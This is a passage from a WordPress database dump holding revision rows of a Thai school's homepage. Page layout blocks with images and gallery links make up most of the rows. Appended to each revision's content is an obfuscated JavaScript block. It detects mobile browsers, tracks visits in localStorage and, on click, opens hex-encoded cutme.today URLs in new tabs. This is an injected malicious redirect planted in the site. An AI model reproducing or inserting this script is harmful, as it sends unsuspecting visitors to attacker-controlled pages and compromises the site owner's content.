_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:49:30','2024-07-27 03:49:30','',14,'http://pakhaeng.ssk.in.th/?p=52',0,'revision','',0),
(54,1,'2024-07-27 10:51:28','2024-07-27 03:51:28','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":200},\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"73adeab7\",\"blockVersion\":4,\"display\":\"block\",\"typography\":{\"textAlign\":\"center\",\"fontSize\":\"20px\"},\"spacing\":{\"paddingTop\":\"10px\",\"paddingRight\":\"20px\",\"paddingBottom\":\"10px\",\"paddingLeft\":\"20px\"},\"backgroundColor\":\"#0366d6\",\"backgroundColorHover\":\"#222222\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-73adeab7 gb-button-text\">เกี่ยวกับโรงเรียน</span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:51:28','2024-07-27 03:51:28','',14,'http://pakhaeng.ssk.in.th/?p=54',0,'revision','',0),
